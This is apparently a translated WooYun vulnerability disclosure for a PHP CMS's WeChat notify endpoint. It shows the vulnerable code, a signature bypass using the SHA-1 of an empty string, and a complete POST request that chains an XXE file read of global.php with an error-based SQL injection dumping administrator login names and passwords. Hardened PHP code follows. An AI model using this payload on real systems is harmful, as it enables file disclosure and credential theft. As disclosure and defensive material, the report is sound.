WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-01-14: Details reported to the vendor, awaiting vendor response
2015-01-16: Vendor confirmed; details disclosed to the vendor only
2015-01-19: Details opened to third-party security partners
2015-03-12: Details opened to core white hats and relevant domain experts
2015-03-22: Details opened to regular white hats
2015-04-01: Details opened to intern white hats
2015-04-14: Details disclosed to the public
As in the title. Both issues are chained into a single request.
app/weixin/notify.php
$wx = new weixin();
if ($wx->check_signature()) {
    // used when WeChat verifies a change of the notification URL
    if (isset($_GET["echostr"])) die($_GET["echostr"]);
    // passive reply to messages and events
    response_msg();
}

function response_msg() {
    global $dbm, $C;
    // raw POST body from WeChat goes straight into the XML parser
    $postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
    if (!empty($postStr)) {
        // external entity loading is left at the libxml default, so a DOCTYPE in the body is honoured
        $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
        $fromUsername = $postObj->FromUserName;
        $toUsername = $postObj->ToUserName;
        $time = time();
        // reply with a text message
        $keyword = trim($postObj->Content);
        $textTpl = "<xml>
            <ToUserName><![CDATA[%s]]></ToUserName>
            <FromUserName><![CDATA[%s]]></FromUserName>
            <CreateTime>%s</CreateTime>
            <MsgType><![CDATA[%s]]></MsgType>
            %s
        </xml>";
        if (!empty($keyword)) {
            $msgType = "text";
            $contentStr = '';
            // look up the auto-reply table; the keyword is concatenated into the SQL unescaped
            $rs = $dbm->query("select * from ".TB_PRE."weixin_auto_msg where find_in_set('".$keyword."',msg_key)");
            if ($rs['error'] == '') {
                ......................................................   // elided in the original report
                // the database error text is reflected back to the sender
                $contentStr = '<Content><![CDATA['.$rs['error'].']]></Content>';
            }
            $resultStr = sprintf($textTpl, $fromUsername, $toUsername, $time, $msgType, $contentStr);
            echo $resultStr;
        }
    }
}
A textbook XML external entity injection: the raw POST body is handed to simplexml_load_string() with external entity loading left enabled, and the response echoes the parsed fields back to the sender. On top of that, the trimmed Content value is concatenated straight into the find_in_set() query, and any database error is reflected in the reply. Both are only reachable after check_signature() passes, so look at that next, in class/weixin.class.php:
public function check_signature() {
    $signature = isset($_GET["signature"]) ? $_GET["signature"] : '';
    $timestamp = isset($_GET["timestamp"]) ? $_GET["timestamp"] : '';
    $nonce     = isset($_GET["nonce"])     ? $_GET["nonce"]     : '';
    $token = WX_TOKEN;
    $tmpArr = array($token, $timestamp, $nonce);
    sort($tmpArr, SORT_STRING);
    $tmpStr = implode($tmpArr);
    $tmpStr = sha1($tmpStr);
    if ($tmpStr == $signature) {
        return true;
    } else {
        return false;
    }
}
WX_TOKEN defaults to an empty string, and timestamp and nonce are optional. With all three empty, the sorted and concatenated string is "" and sha1("") is da39a3ee5e6b4b0d3255bfef95601890afd80709, so the check passes for anyone without knowing anything about the installation. I therefore requested
/app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709
The installer forces the administrator to change the backend path, but that path is stored in www/config/global.php, so the XXE can be used as an arbitrary file read to recover it. The complete POST request, combining the file read with an error-based SQL injection in one body:
POST /app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 
X-Forwarded-For: 127.x'.x.x.1
Connection: keep-alive
Content-Type: text/xml
Content-Length: 377

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/Wamp/www/config/global.php">
]>
<xml>
<ToUserName>&test;</ToUserName>
<Content>123',msg_key) and 1=updatexml(1,concat(0x5c,(select concat(login_name,0x5c,login_pass) from mcms_user where login_level='100')),1)#</Content>
</xml>
The injection returned data and the file was read out in the same response: the updatexml() error message carrying login_name and login_pass comes back in the reflected $rs['error'] inside <Content>, and the base64-encoded global.php lands in the response's <FromUserName> (the template swaps the two user fields, so the entity expanded in ToUserName is echoed there). Base64-decode it to obtain the backend path.
Fix suggestion: strengthen input filtering.
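As an added example (not part of the original report and not the vendor's code), here is how the two entry points would be hardened in PHP: the signature check refuses an empty token, requires and bounds the timestamp and compares in constant time; the XML parser rejects any DOCTYPE and disables external entity loading; and the auto-reply lookup binds the keyword as a parameter and never echoes database errors. The PDO handle `$pdo`, the `msg_content` column, and the helper names `check_signature_hardened`, `parse_wx_message`, `lookup_auto_reply` and `handle_notify` are assumptions for illustration; the report does not show the table layout or the `$dbm` wrapper's API.

```php
<?php
// Added example: hardened counterparts of check_signature() and response_msg().
// Not the vendor's code. Assumes a PDO connection ($pdo) and a msg_content column in
// weixin_auto_msg (both assumptions; the report does not show the schema).

function check_signature_hardened(string $token, array $get, int $maxSkew = 300): bool
{
    // The original bypass: WX_TOKEN defaulted to '' and timestamp/nonce were optional,
    // so sha1('') was a valid signature for every request. Refuse to run without a token.
    if ($token === '') {
        return false;
    }
    foreach (['signature', 'timestamp', 'nonce'] as $k) {
        if (!isset($get[$k]) || !is_string($get[$k]) || $get[$k] === '') {
            return false;
        }
    }
    // Bound the replay window; otherwise a captured signed URL stays valid forever.
    if (!ctype_digit($get['timestamp']) || abs(time() - (int) $get['timestamp']) > $maxSkew) {
        return false;
    }
    $tmpArr = [$token, $get['timestamp'], $get['nonce']];
    sort($tmpArr, SORT_STRING);
    $expected = sha1(implode($tmpArr));
    // hash_equals() instead of ==: constant time, and no type juggling on numeric-looking strings.
    return hash_equals($expected, $get['signature']);
}

function parse_wx_message(string $postStr): ?SimpleXMLElement
{
    // A WeChat push never carries a DTD, so any DOCTYPE is hostile; reject it before parsing.
    if (stripos($postStr, '<!DOCTYPE') !== false) {
        return null;
    }
    // Belt and braces: forbid external entity loading and network access for the parser itself.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true); // the default (and deprecated) from PHP 8.0 onwards
    }
    libxml_use_internal_errors(true);
    // Never add LIBXML_NOENT or LIBXML_DTDLOAD here.
    $xml = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA | LIBXML_NONET);
    libxml_clear_errors();
    return $xml === false ? null : $xml;
}

function lookup_auto_reply(PDO $pdo, string $keyword): ?string
{
    // Bound parameter: the keyword never becomes SQL text, so the updatexml() error-based
    // payload from the report is just an unmatched keyword.
    $prefix = defined('TB_PRE') ? TB_PRE : '';
    $sql = 'SELECT msg_content FROM ' . $prefix . 'weixin_auto_msg WHERE FIND_IN_SET(?, msg_key) LIMIT 1';
    try {
        $stmt = $pdo->prepare($sql);
        $stmt->execute([$keyword]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // Log server-side only. The original reflected $rs['error'] to the sender, which is
        // what carried login_name/login_pass out inside the database error message.
        error_log('weixin auto-reply lookup failed: ' . $e->getMessage());
        return null;
    }
    return $row ? (string) $row['msg_content'] : null;
}

// CDATA cannot contain ']]>'; split it so a crafted OpenID cannot break out of the section.
function cdata(string $s): string
{
    return str_replace(']]>', ']]]]><![CDATA[>', $s);
}

function handle_notify(PDO $pdo, string $token, array $get, string $postStr): string
{
    if (!check_signature_hardened($token, $get)) {
        http_response_code(403);
        return '';
    }
    $msg = parse_wx_message($postStr);
    if ($msg === null) {
        http_response_code(400);
        return '';
    }
    $keyword = trim((string) $msg->Content);
    $reply = $keyword !== '' ? lookup_auto_reply($pdo, $keyword) : null;
    if ($reply === null) {
        return 'success'; // WeChat's documented "no reply" acknowledgement
    }
    $tpl = '<xml><ToUserName><![CDATA[%s]]></ToUserName><FromUserName><![CDATA[%s]]></FromUserName>'
         . '<CreateTime>%d</CreateTime><MsgType><![CDATA[text]]></MsgType>'
         . '<Content><![CDATA[%s]]></Content></xml>';
    return sprintf($tpl, cdata((string) $msg->FromUserName), cdata((string) $msg->ToUserName), time(), cdata($reply));
}
```

The entry point would call `echo handle_notify($pdo, WX_TOKEN, $_GET, file_get_contents('php://input'));`. Note that the DOCTYPE rejection and `libxml_disable_entity_loader()` are two independent layers: the first stops a DTD ever reaching the parser, the second means that even an entity smuggled past it cannot touch the filesystem or network.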
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-01-16 17:09
We will handle it as soon as possible. Thank you for your support.
None yet